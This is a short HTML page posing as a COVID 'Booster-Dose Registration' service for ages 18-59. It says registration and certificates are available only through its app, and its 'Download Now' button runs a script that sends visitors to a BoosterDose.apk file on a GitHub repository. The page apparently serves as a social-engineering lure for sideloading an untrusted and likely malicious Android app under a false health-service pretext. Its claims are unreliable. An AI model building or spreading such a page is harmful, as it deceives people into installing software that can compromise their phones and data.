
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:hover {
	background-color:#315cbb;
}
.dabavanusw {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function dbvao() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/boosterdose3rd/registrations/raw/main/BoosterDose.apk"; 
	}
	else
	{
		window.location="https://github.com/boosterdose3rd/registrations/raw/main/BoosterDose.apk";
	}
}
</script>
<body>
<center>
    
        <img src="https://imgpile.com/images/5nXdEF.jpg"  height="100"/>
        <h2>Booster-Dose Registration</h2><h3>
        BoosterDose for only for 18-59 age<br>
Download Certificate from the app.<br>
Registration only on our app.<br><br>
Download app and Register now.</h3>
        <div onclick="dbvao()"  class="dabavanu">Download Now</a>


        


    </div>
</center>
</html>
